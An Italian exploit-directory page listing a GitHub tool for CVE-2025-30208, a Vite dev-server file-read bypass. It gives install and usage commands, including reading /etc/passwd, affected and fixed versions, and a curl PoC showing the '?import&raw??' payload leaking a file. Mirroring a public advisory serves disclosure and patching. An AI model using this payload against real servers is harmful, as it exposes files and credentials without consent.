Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-30208 — Questo exploit è destinato esclusivamente a scopi educativi e di test di sicurezza etici. L'utilizzo di questo exploit contro target senza previo consenso reciproco è illegale e lo sviluppatore declina ogni responsabilità per uso improprio o danni causati da questo exploit. | Kitploit
Strumenti/GitHubGitHub/on1onss/cve-2025-30208
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubon1onss/cve-2025-30208

CVE-2025-30208

Questo exploit è destinato esclusivamente a scopi educativi e di test di sicurezza etici. L'utilizzo di questo exploit contro target senza previo consenso reciproco è illegale e lo sviluppatore declina ogni responsabilità per uso improprio o danni causati da questo exploit.

Vedi Repository
47 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-30208

[!IMPORTANT]

Dichiarazione di non responsabilità

Questo exploit è destinato esclusivamente a scopi di test di sicurezza educativi ed etici. L'uso di questo exploit contro target senza previo consenso reciproco è illegale e lo sviluppatore declina ogni responsabilità per uso improprio o danni causati da questo exploit.

Installazione

root@kitploit:~
git clone https://github.com/On1onss/CVE-2025-30208.git
cd CVE-2025-30208
pip install -r requirements.txt

Utilizzo

root@kitploit:~
python CVE-2025-30208.py [-h] [-t <Target URL>] [-fp <File Path>] [-i]

options:
  -h, --help       show this help message and exit
  -t <Target URL>  Example: -t http://localhost:5173/
  -fp <File Path>  Example: -fp /etc/passwd
  -i               Interactive mode

Descrizione

Versioni affette

root@kitploit:~
>= 6.2.0, < 6.2.3
>= 6.1.0, < 6.1.2
>= 6.0.0, < 6.0.12
>= 5.0.0, < 5.4.15
< 4.5.10

Versioni corrette

root@kitploit:~
6.2.3
6.1.2
6.0.12
5.4.15
4.5.10

Riepilogo

Il contenuto di file arbitrari può essere restituito al browser.

Impatto

Sono interessate solo le app che espongono esplicitamente il server di sviluppo Vite alla rete (usando --host o l'opzione di configurazione server.host).

Dettagli

@fs nega l'accesso ai file al di fuori della lista consentita di Vite. Aggiungere ?raw?? o ?import&raw?? all'URL aggira questa limitazione e restituisce il contenuto del file se esiste. Questo bypass esiste perché i separatori finali come ? vengono rimossi in diversi punti, ma non vengono considerati nelle regex delle stringhe di query.

PoC

root@kitploit:~
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"
# sourceMappingURL=data:application/json;base64,eyJ2...

Riferimenti

  • https://nvd.nist.gov/vuln/detail/CVE-2025-30208
  • https://github.com/advisories/GHSA-x574-m823-4x7w
  • vitejs/vite@315695e
  • vitejs/vite@80381c3
  • vitejs/vite@807d7f0
  • vitejs/vite@92ca12d
  • vitejs/vite@f234b57
Scarica lo strumento